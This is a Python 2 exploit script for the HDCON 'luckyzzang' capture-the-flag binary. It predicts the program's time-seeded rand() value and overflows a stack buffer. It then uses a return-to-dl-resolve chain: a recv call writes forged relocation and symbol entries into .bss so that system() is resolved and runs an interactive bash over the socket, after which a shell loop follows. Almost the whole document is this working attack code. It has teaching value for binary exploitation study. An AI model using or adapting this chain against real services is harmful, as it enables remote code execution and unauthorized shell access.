hdcon luckyzzang exploit (return-to-dl, exploit only, local)

from socket import *

import struct

import sys

import ctypes

library = ctypes.CDLL('libc.so.6')

i = 0

while i <= 70:

 library.srand(library.time(0))

 i = library.rand() % 100

buffer = 0x804A028 + 160 # bss

target = 0x804A040 # recv

plt    = 0x80485F0

recv   = 0x80485F0

stacklift = 0x080489CC

dynstr = 0x804831C

jmprel = 0x8048418

symtab = 0x80481CC

p  = lambda x: struct.pack("<L", x)

ph = lambda x: struct.pack("<I", x)

pb = lambda x: struct.pack("<B", x)

log = lambda x: sys.stderr.write(x+'\n')

######## rel ##############################################

rel  = p(target)

rel += p((((buffer - symtab + 18+16)/16)<<8) + 7) # 16 multiplier

######## sym ##############################################

sym  = p (buffer - dynstr + 38)

sym += p (0xff) # writable int, isn't it?

sym += p (0xff) # symbol size (st_size)

sym += pb(0xf0)   # symbol info (st_info)

sym += pb(0xc0)   # symbol other - must be 0

sym += ph(0xffff) # symbol index

sym += "system\x00"

######## connect ##########################################

s = socket(AF_INET, SOCK_STREAM)

cnt = 0

def send(x):

 global cnt, s

 cnt = cnt + len(x)

 s.send(x)

s.connect(('0.0.0.0', 7777))

print s.recv(1024)

######## payload (stage 1) ################################

payload = rel

payload += "A" * (20 - len(payload))    # dummy

payload += sym

payload += "bash -i <&4 >&4 2>&4 ##"

####### payload (stage 0) #################################

stage0 = "A" * 0x408

stage0 += p(buffer)       # SFP

stage0 += p(recv)           # RET  (recv)

stage0 += p(stacklift)             # RET2 (leave + ret)

stage0 += p(4)              # recv(fd,

stage0 += p(buffer)         #      buffer,

stage0 += p(len(payload))   #      length,

stage0 += p(0)              #      flag)

stage0 += p(0x80485FB)

stage0 += p(buffer - jmprel)           # index here

stage0 += p(plt)                         # ret after system

stage0 += p(0)

stage0 += p(buffer + len(payload) - 23) #arg1

stage0 += "B" * (1025 + i - len(stage0))

############################################################

raw_input()

send(stage0)

send(payload)

print s.recv(1024)

print 'Payload : %d Bytes' %cnt

# SHELL IN PYTHON

while True:

 r = raw_input()

 send(r+'\n')

 sys.stdout.write(s.recv(102400)+s.recv(102400))